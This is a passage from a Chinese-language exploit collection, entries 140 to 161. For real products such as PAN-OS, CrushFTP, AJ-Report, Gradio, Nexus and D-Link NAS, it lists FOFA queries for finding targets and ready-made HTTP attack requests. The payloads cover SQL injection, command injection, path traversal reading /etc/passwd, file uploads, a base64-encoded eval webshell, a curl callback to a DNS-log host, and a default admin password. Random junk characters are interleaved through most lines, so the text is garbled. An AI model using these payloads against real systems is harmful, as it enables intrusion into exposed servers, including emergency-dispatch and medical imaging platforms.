' y! a8 N" r* e4 _* J) ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 F/ f9 `2 v- I' C Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 m- k7 Y# D7 h t7 ^9 VAccept-Encoding: gzip, deflate, br
7 b' ]3 |8 u7 E4 d9 ?5 Y( a/ ^Connection: close z. K* Y4 z; b' s2 q# n
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
# g( g' d3 K- X d" c x+ bUpgrade-Insecure-Requests: 1, l* [" r6 R5 q: e/ d, z/ M+ S
" ?7 N" F+ v* f# p
2 u5 @4 Y. A% O* `6 G# ~140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
. H% c: [9 c6 Y' k) W& Y. `$ `3 ]CVE-2024-25666 r$ k: `3 e! {* u, L
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; h" i# }: k! W" S$ f* Z
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1 |, S6 ~2 M' ], s% X
Host: x.x.x.x" `( A4 [2 [( n# {+ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ J9 d4 |* y* j3 o" e& u. c" tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, K+ ?: \# Q# O9 {7 T9 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 f' w$ {" r* ~5 G* Z
Accept-Encoding: gzip, deflate, br/ a2 X2 O5 t% K
Connection: close; i- a, K9 B) V& h
Cookie: authcode=h8g9" Q7 t# m L+ d' |
Upgrade-Insecure-Requests: 1
5 y* b3 m" G9 L/ d/ k, {; b4 x
6 o8 [+ l+ [/ R" U! P
% x9 I1 i* b4 u9 t$ K2 a141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入- ~% P( |" c. r! m: a( M
FOFA:body="指挥调度管理平台". Q3 p8 |' h \: K* \* \
POST /app/ext/ajax_users.php HTTP/1.17 `% \/ p. R. y0 A; ]6 e
Host: your-ip
# B) F* ]& w0 g# vUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info' s# f( [9 r6 h G
Content-Type: application/x-www-form-urlencoded& b: Y$ {. [2 G, j' W
( F r& C& ?0 h+ \9 F7 B/ d6 \5 J# w+ b9 f# p7 i. Q$ M
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -# {. P) I& b1 p/ a7 v
$ x" v) |3 i8 N# _0 B/ X) {+ G
# d' b0 b4 n% B" T! c: S d
142. CMSV6车辆监控平台系统中存在弱密码
& Z# g% y8 v% ~: [8 c2 MCVE-2024-29666
& ^: ^% a8 i3 ^4 |3 v+ aFOFA:body="/808gps/"
9 w6 c+ R2 P+ i! C& t8 \admin/admin! j# C) O+ ]' N8 s* k
143. Netis WF2780 v2.1.40144 远程命令执行
- P) P# C. H5 v. ~CVE-2024-25850
- H# O7 s0 `) ~6 eFOFA:title='AP setup' && header='netis'
* a4 A4 e8 r* w5 CPAYLOAD4 [# `- [8 y4 ]2 T j$ h0 H, J
7 z6 p* @9 C1 r
144. D-Link nas_sharing.cgi 命令注入
9 I+ M, S5 L- ^8 _9 W, B0 v- BFOFA:app="D_Link-DNS-ShareCenter"
. v, d6 u0 M) m% c [system参数用于传要执行的命令0 X3 i& x* g: ?
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1# j, O) D" V* _) v
Host: x.x.x.x
6 p, h( k5 O5 M. EUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.01 R& [4 o. M6 S/ R. p* D1 e% f
Connection: close
2 W& x8 N2 ]* z" B! G5 eAccept: */*' B. d, l( E9 @
Accept-Language: en
+ p" m! `7 Z9 O; _9 HAccept-Encoding: gzip. D+ I, ?( `4 ^5 q' g4 i
9 _' I$ c0 W$ v* ]8 W* a/ D4 L; m v8 U1 M0 C
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入; v$ e6 l: J% D0 F0 ~8 a
CVE-2024-3400
' j: w: v6 L" n7 qFOFA:icon_hash="-631559155"
9 k" X. ~* }+ R0 YGET /global-protect/login.esp HTTP/1.1
3 L y1 f2 n& ^6 Y- dHost: 192.168.30.112:1005# \: X# e+ k- H. X) t9 ?( K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
# \' h/ c! H( r) HConnection: close: {+ z' d4 P9 h& t( k5 }: F3 ^
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
6 B2 M. \6 t; O D' t, LAccept-Encoding: gzip
' Q* B9 e; W) E; w, j) H$ \2 A, ?$ H, [. @
: [1 ~ W. b+ k" H' p* t; B
146. MajorDoMo thumb.php 未授权远程代码执行
9 `: o7 E: O- @- cCNVD-2024-02175
' D, n4 ~4 m) E1 W+ cFOFA:app="MajordomoSL"
5 ]& z; G; k( U, bGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
( A. ]6 _) n, M2 D w! H6 h" U! C. xHost: x.x.x.x
" s3 u4 a3 {" u+ p, MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 b( _: Q& i) W
Accept-Charset: utf-8) q; W! [( ]7 u) J
Accept-Encoding: gzip, deflate
# n* m; p+ p2 w7 U+ XConnection: close
# o: [2 M t( Z! N: F" [6 r# O3 o) {- H
$ m; c& M o% k' Z( j147. RaidenMAILD邮件服务器v.4.9.4-路径遍历+ J5 R3 k% n; K7 W& D. o6 \% ~% c
CVE-2024-32399
) u9 [6 ]. l' @. Z5 T0 n, AFOFA:body="RaidenMAILD"
% |& w- I) Z% n0 P8 D; ~0 v/ W1 zGET /webeditor/../../../windows/win.ini HTTP/1.1
6 U; P0 w* P: j7 p% nHost: 127.0.0.1:81
J& s n, i9 [, RCache-Control: max-age=0
+ {7 c8 L8 }" Q! D0 I7 Y, R! GConnection: close! I9 F* f3 T, c) ^$ K. p
2 b+ l4 H6 x# }3 Y1 R- o! M9 Z! E7 Y5 l" n1 W( f
148. CrushFTP 认证绕过模板注入
% f, B) Y7 f; R! Z+ K6 J6 i$ oCVE-2024-4040+ {2 d( u( Y9 B, {3 }5 L0 g
FOFA:body="CrushFTP"* W, {; z6 }, ~9 V) Y
PAYLOAD
1 w& T4 x/ N$ R v. _
7 ]6 q0 A0 F; [+ Y, p& N149. AJ-Report开源数据大屏存在远程命令执行
# |6 A. x3 _3 r4 m* D4 IFOFA:title="AJ-Report"% H Q, J- K9 s( C
4 R. b: A& [' C/ |% s, MPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
8 a5 Z1 b9 J8 eHost: x.x.x.x7 _. w* E) e% V. i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. C) [& L6 G) S; p2 L% @1 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- O& `8 \) f) T U8 MAccept-Encoding: gzip, deflate, br( E* D' j" m. ]" R0 ?* y
Accept-Language: zh-CN,zh;q=0.9
~% ]% H3 t. O& k9 E# f# _Content-Type: application/json;charset=UTF-8
4 l* y7 F1 h% GConnection: close
7 E6 u2 h- X% l+ }, k* C8 U- e- @. }# {8 |4 ~
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}6 X* z; J3 d& u9 y6 R
) O2 E) y6 x" |3 `# K% c
150. AJ-Report 1.4.0 认证绕过与远程代码执行2 ?* y: B$ V3 b" V$ n# a& e
FOFA:title="AJ-Report"& B/ n- c! \$ L/ G) S( m
POST /dataSetParam/verification;swagger-ui/ HTTP/1.12 i7 N+ `2 t- U( E2 U0 B7 C2 U( P
Host: x.x.x.x7 Q, H: P- ?; N7 d+ i r( E% u0 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* S2 Q/ b6 ~/ a/ W) q: BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' ^2 w: |+ d3 H4 d$ c/ |/ _; M/ v* VAccept-Encoding: gzip, deflate, br
1 P5 Q6 p8 C# B/ ~/ WAccept-Language: zh-CN,zh;q=0.97 I1 l$ b% b% k( Z
Content-Type: application/json;charset=UTF-8
, w* c' {" f! s6 ~Connection: close
1 D/ t1 U+ U8 I& pContent-Length: 339 H/ J7 t& E2 }* U. [5 d6 e
. F- d: Q1 N: d! _& e. ~1 m
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
3 e- R, B! W) P2 W( }; y6 ~: k; S. r8 W3 t/ n+ P' H/ O
1 L+ I6 ]7 c2 A L' h* i" \
151. AJ-Report 1.4.1 pageList sql注入- o; K& O9 I1 ^0 K; j# @
FOFA:title="AJ-Report"5 F. `" S- v' j ]3 b1 ?- n
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.11 X7 i8 R) u. q5 H
Host: x.x.x.x1 O; y# E6 `5 v* ?. L6 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( F" S! Y8 Z0 Q% ?6 B' b
Connection: close
- O# R' N# k! e; h4 WAccept-Encoding: gzip/ c" G( u1 Z/ a( p- x
" a3 }: P/ u% g" ^- o. F6 m$ D# k& T1 r0 p: _6 ]9 x z" [ e
152. Progress Kemp LoadMaster 远程命令执行
; h7 }" p2 M5 m# H1 t* ^: t* cCVE-2024-1212
9 B$ X- B, F0 _- ]2 V+ _LoadMaster <= 7.2.59.2 (GA): W, T' u7 s4 z
LoadMaster<=7.2.54.8 (LTSF)
6 p: T6 E+ N% H( t1 l' L' g) O$ cLoadMaster <= 7.2.48.10 (LTS)
; t9 z& x/ p0 A2 F0 b& Q6 X3 u6 \! rFOFA:body="LoadMaster"( ]+ m- L# X& n. q" I$ j( a; ~3 a# g
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码( g, p1 M: y1 k+ t0 ]8 P4 A" J
GET /access/set?param=enableapi&value=1 HTTP/1.1" R7 x% T5 M/ j" n) Y. Q0 E
Host: x.x.x.x
1 J( f/ P+ w! V# kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1 K. w7 F0 w/ @2 `! u5 b2 M
Connection: close- C7 t* F/ s) S0 k, i
Accept: */*
5 ?. a w% C0 X0 D/ q4 RAccept-Language: en+ a& i# g2 F) b0 |4 n; [% H: ]
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
. ^3 Y1 D* _6 p/ cAccept-Encoding: gzip% d) G0 d7 f( P! t
& y" d6 b; A4 W% B2 @ W9 [1 V7 M. | {. Y# l& }$ r/ K( Z
153. gradio任意文件读取# v6 _, D4 ^- f8 o
CVE-2024-1561FOFA:body="__gradio_mode__"9 r2 S( a& _ v0 K1 v; V
第一步,请求/config文件获取componets的id
7 W- W1 k" t+ v0 | e% k( _http://x.x.x.x/config8 p6 G( o8 b3 s! W! `2 a( I, E p; q
1 O9 |& n* j! e3 u, V8 g' x4 c! H+ S m1 { N! Y
第二步,将/etc/passwd的内容写入到一个临时文件
; R7 h* |- d) N/ v/ u$ o# @POST /component_server HTTP/1.1# w [, \6 [3 B% @" g
Host: x.x.x.x
9 ?2 f i/ ^' |* Y! A& B- uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
+ W8 F# X: z9 r9 b6 IConnection: close
) S2 r7 I' B- U6 [Content-Length: 115" w" y- t( R0 w- _$ Z. n
Content-Type: application/json& T9 k2 A/ a6 `; c
Accept-Encoding: gzip
% C8 S( \) r3 p* N5 V" ~
6 O4 d3 t; @( I' A{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}1 I$ O, h( v, c3 x' @: v
+ \5 C' ?( e7 B# _
0 U( d# ]! K; G) ~* z' \3 n5 y第三步访问
+ T7 s- h! k3 B. }* h1 R9 phttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd) k) c5 z% F9 ^% \" [9 Z
- o+ t7 r- S/ k# C/ j0 _6 m4 m! B3 N$ |- `9 n( Y# E
154. 天维尔消防救援作战调度平台 SQL注入
9 F5 Z& ^" m/ a$ SCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"% ^* x, c! z/ x
POST /twms-service-mfs/mfsNotice/page HTTP/1.1: ]) g: q( @2 `4 ~. w( a/ |
Host: x.x.x.x
2 n S3 T) R4 y0 P" N# H# n9 ?- YContent-Length: 1063 O( M' {& B8 Q4 j. k
Cache-Control: max-age=0
* y7 w! J& q dUpgrade-Insecure-Requests: 1
- A) U) K! K; AOrigin: http://x.x.x.x2 H9 Z* D$ }7 o6 U, p: q5 _
Content-Type: application/json' C. W: N: b* O8 {+ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
/ l0 c' {% d3 k, u: PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& u1 U+ w" n, J: B6 i2 ]
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page, {- _; k& P: f$ V
Accept-Encoding: gzip, deflate6 F7 D1 s: [1 k/ X9 d
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7/ g- y. @, ]. I; F5 `
Connection: close/ U- h; v; V; u4 F8 t$ d4 ^
M& c9 I0 S' P0 a2 k. D{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}" ?! X# T7 y+ n( C/ n/ F3 X0 N% t8 I
6 A$ p. s/ Y) u% y
. a! ~" d( M" Y0 o1 {1 G. e155. 六零导航页 file.php 任意文件上传 {: b) e W T9 S; s: k2 @
CVE-2024-34982! g. r( _" l5 y- F
FOFA:title=="上网导航 - LyLme Spage"/ Q3 W1 r! Q+ }* f
POST /include/file.php HTTP/1.1- |. o/ p0 S1 }8 n _7 J( s) N$ z
Host: x.x.x.x
& f! ]4 ~' R( f5 U8 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& J8 x4 m# `2 C& u" c3 x; [1 p* RConnection: close
7 {3 i- h2 p5 |* }7 VContent-Length: 232
7 C% c x/ P+ x( H& P( yAccept: application/json, text/javascript, */*; q=0.01
7 a3 K7 i: F7 A4 {3 A- o1 bAccept-Encoding: gzip, deflate, br- {- C1 x" E. h9 y, Q0 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 k' d* d* H) L! P$ `
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f) \2 o& }1 B- Q0 W' a/ n
X-Requested-With: XMLHttpRequest* Q( B/ S. U& v3 g' S! V/ i
" K! V# K2 N* K8 O2 r+ O$ r4 a-----------------------------qttl7vemrsold314zg0f
- b. L! A+ r c; e' y/ g2 E: UContent-Disposition: form-data; name="file"; filename="test.php") M* P1 C' n0 S8 @1 c! b
Content-Type: image/png* d* Z$ F$ J' z8 S
A4 c6 L7 x$ g3 @3 C S) C% M6 _<?php phpinfo();unlink(__FILE__);?>
) i! v8 `$ L6 y0 _! Z-----------------------------qttl7vemrsold314zg0f--
; Q! H! v, {7 P! O* I0 u
2 T) Q( |$ a+ C& S8 ], x
7 {: T9 U5 S) X2 F, L+ b访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php+ D8 ]6 w+ c$ k- k
I4 b* K" \( T6 C156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ P) j8 N1 X( Q& W* K/ @: \CVE-2024-3721$ Z% S9 k i/ k# T7 P2 q* _9 [* A
FOFA:"Location: /login.rsp") t- }+ C8 d4 b. Y- f
·TBK DVR-4104$ o% l9 j* g4 s, ~ T
·TBK DVR-4216% f x# h6 C& `, ^% R! ^
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
5 E! }! W2 ?1 T E) }+ l% H# T ?4 r& `% W t; b" H2 ]2 C
- P: U6 o: K( F' {1 S; d4 {POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
3 b9 `9 b$ i: bHost: x.x.x.x
( g: k+ W. w( ^7 [* @7 eUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 o2 h! m# k2 M' t- b& {Connection: close5 A. |+ t% a6 Z/ a, n
Content-Length: 0
I0 y6 H7 j! @- f1 S$ D1 UCookie: uid=1! W7 X" e W+ q
Accept-Encoding: gzip
& }- O2 ^/ x) T2 y" _- Y
8 ?4 J4 R& }' M* M, m( R6 g9 x; U5 i- Z, h9 t) W8 }' e
157. 美特CRM upload.jsp 任意文件上传
/ m; j, i' h9 i0 Q: p* }1 |; [! KCNVD-2023-06971
4 m7 Z2 G' |6 dFOFA:body="/common/scripts/basic.js"3 A2 `$ p% M( g
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
' ~3 `/ \. w. [& H \: _6 [6 F) kHost: x.x.x.x
9 b4 A+ f2 H0 Y8 R" M: tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2 y2 d; Z: ^ t% dContent-Length: 709" h8 E0 u' f F5 w$ M( [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! y: Z- D: @1 i+ ^0 L% W$ d# U
Accept-Encoding: gzip, deflate% ]- n$ Y% j+ O9 d" Q5 U) j
Accept-Language: zh-CN,zh;q=0.9
4 u/ n$ [* c. r1 QCache-Control: max-age=0
2 R* w, ~8 a4 {8 q6 YConnection: close* ^% [& I. |- {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN# U. i6 |/ c8 U; ?
Upgrade-Insecure-Requests: 10 A/ N, z' g3 {3 w) v
" J: C# \+ K: T& ?: C; v! R
------WebKitFormBoundary1imovELzPsfzp5dN' F1 {9 E$ ]6 t4 a
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"( ]. Y& j* H5 S" O0 G+ T* }% l3 x) l
Content-Type: application/octet-stream
; a9 n2 D2 X) B9 i; p( ^5 d' {
5 D. F% w, J3 x1 _- k" i6 o3 f1 x, u* snyhelxrutzwhrsvsrafb
2 ?! F4 j; j% k- J------WebKitFormBoundary1imovELzPsfzp5dN
. W1 B% m1 X) b' x4 |& L0 sContent-Disposition: form-data; name="key"
/ H( D, R/ d; H/ `% `% D5 b. L' r7 }; L( a/ K* X
null
$ r' c$ v0 f$ D. Z( Q- q------WebKitFormBoundary1imovELzPsfzp5dN+ _; D. i: N$ c9 g2 H# Q
Content-Disposition: form-data; name="form"
9 i' x7 [/ n. a1 U9 Z
1 ]0 ?" m5 O3 A5 L9 @9 {9 enull, |* R- M3 D; N/ u+ W3 R2 E
------WebKitFormBoundary1imovELzPsfzp5dN
/ C6 L t8 o$ F$ p6 jContent-Disposition: form-data; name="field"7 m6 M; T* F7 s( h& v- g: ~) [; ~
( F3 t" J( M& S/ b4 v' j- ?& T- anull
* s( l& V7 Q! o5 w------WebKitFormBoundary1imovELzPsfzp5dN
# k: x+ X- Y7 h0 v7 QContent-Disposition: form-data; name="filetitile"
7 @/ t# F4 K6 {# N+ f$ W- R7 ^/ o7 p
null
: }0 }7 L/ |3 C/ U& V------WebKitFormBoundary1imovELzPsfzp5dN) M( D. ~! R* M* }5 k4 h/ Z
Content-Disposition: form-data; name="filefolder"
( f& D9 F0 a/ D a/ G0 {# X2 t' Q4 q& }5 N: u4 d) \
null
( h6 ?: F/ D- K. E9 e+ i------WebKitFormBoundary1imovELzPsfzp5dN--
7 C% X) u* d% U) X
- D4 L7 C1 F4 r( `
; Z) I g: F; Z9 N0 whttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
* n* g% q' I" c
6 Z) F K, }; G7 p B8 s158. Mura-CMS-processAsyncObject存在SQL注入
* [, I. p$ \8 A# x5 b$ _4 \/ r" yCVE-2024-32640$ {/ D1 K1 m7 s! n1 X
FOFA:"Generator: Masa CMS"
( g! t# |/ V4 R) r* T% a3 G% r; wPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1. P' u- T' T* U6 S# \+ N
Host: {{Hostname}}
9 z7 E/ Z+ B; f% G" pContent-Type: application/x-www-form-urlencoded
! p0 z) }8 t1 [, e- }' T; K1 O) C4 l9 {7 f7 u8 v, T
object=displayregion&contenthistid=x\'&previewid=1
: o) }/ i4 H! v; [! U9 X6 l2 ^, O
3 V# ~. @7 w, Q. Q3 E7 O/ H
; k) ?3 G, H @4 ?159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
; W+ r j$ ^8 hFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
% t$ ]7 N8 |7 y- m: fPOST /webservices/WebJobUpload.asmx HTTP/1.1. K- `4 @# r4 }' Y- x
Host: x.x.x.x" A1 ^4 r/ g& a2 ]! j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
1 E0 |( k5 a( w2 U1 qContent-Length: 1080
' ~9 `1 O$ x4 ^5 b' EAccept-Encoding: gzip, deflate9 q7 y5 K, S+ L, ?! O
Connection: close
3 a) h0 D+ a. a& v W" AContent-Type: text/xml; charset=utf-81 e+ `9 J" b9 s2 o0 }6 j
Soapaction: "http://rainier/jobUpload"$ _$ n4 e4 F! U3 M
& z: `9 w: C) Y* R<?xml version="1.0" encoding="utf-8"?>4 v. Y% I0 p! N
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">) t1 ]( R2 d2 Z
<soap:Body>
5 }( V4 H# }! P+ ~, D<jobUpload xmlns="http://rainier">
5 Y! L4 C6 b% E; q4 _2 i$ P. H<vcode>1</vcode>
. P% j7 h% w( L( l- h+ X<subFolder></subFolder>
; J1 m; j7 s! m' F<fileName>abcrce.asmx</fileName>1 w* [) u$ `; K5 b0 N8 F* x
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>& L5 u: N6 O, R: u0 ^( m
</jobUpload>
6 C2 M& H* y+ ^: p) e2 @</soap:Body>
1 C" f) }: v1 \' d- W. W3 V0 c: G1 T</soap:Envelope>
) x# O7 C" c% Z) E, A0 k% _2 M- d! i9 F2 D: L: y" i
/ z+ ~3 m' O6 }( A8 T/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
/ V1 v: F5 f0 H8 \( R `0 J
6 K- s' X/ I2 W4 f3 i& \
& }, f& c, O m. ]% }9 p' p) R3 Y160. Sonatype Nexus Repository 3目录遍历与文件读取% ?$ m: P1 |: N
CVE-2024-4956' |+ Q0 {6 j. u5 |' [! ]
FOFA:title="Nexus Repository Manager"; i1 A4 J+ O% x$ C) ]
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1) S# f$ d7 t! z T6 a& D
Host: x.x.x.x
* n( i0 o/ X( ~- I& j4 eUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
; Z* M- {( ^+ r3 `; X" AConnection: close& N( \% f! }5 b
Accept: */*8 \% d( {$ |& `7 b F- O
Accept-Language: en4 V% r! L# {! y3 }: w2 p* s
Accept-Encoding: gzip1 H; h9 |* |0 z* g+ S* Q4 g' B
7 L5 N. H* K/ i8 o6 e! n( p( C
: c9 N/ ^4 U5 i/ u d3 q' f9 Q
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传0 o% O/ b* a. x) N; t
FOFA:body="/KT_Css/qd_defaul.css"
& |5 f1 O( k7 U! `第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密! Q6 U4 A0 X" O$ r4 T3 |
POST /Webservice.asmx HTTP/1.18 ?+ J5 C$ t- A1 {& D' I
Host: x.x.x.x
3 i1 q! k$ J' d6 i2 x0 j% s4 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36; @3 o8 R0 X+ ]4 |* ~% e
Connection: close
/ ]( H' K+ t) [+ N0 N* J- mContent-Length: 445* A& l: c" o. i
Content-Type: text/xml, S% F, s' R6 o5 b$ G6 e" g; J1 U
Accept-Encoding: gzip" r" k% V3 T; }1 P
! C- k# V$ O7 ]/ l2 a<?xml version="1.0" encoding="utf-8"?>6 d- R+ e, I+ J' f- u
<soap:Envelope xmlns:xsi="8 `& V1 d' j9 l
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
3 P ?) A$ A1 ?0 U, t, dxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
0 \7 K q! u. W, W( }<soap:Body>
P- W7 |/ i$ v2 c$ S$ _6 Z+ C- b* x+ M<UploadResume xmlns="http://tempuri.org/">
, |& K, d& n# g<ip>1</ip>, _1 C% _% v) y# x6 C
<fileName>../../../../dizxdell.aspx</fileName>. l" _) M2 Q* N. |5 q2 X5 g
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
/ Y! D! M$ K* j/ x b: {+ H<tag>3</tag>
. `- v) I# b9 v6 _: a1 z" m</UploadResume>/ W' ?/ p# Y( e. k g. E
</soap:Body>* K& O. C0 q4 e) v% x: s1 x
</soap:Envelope>5 J" |; |- y5 I" A2 Z
0 k( |( Q% g7 O _
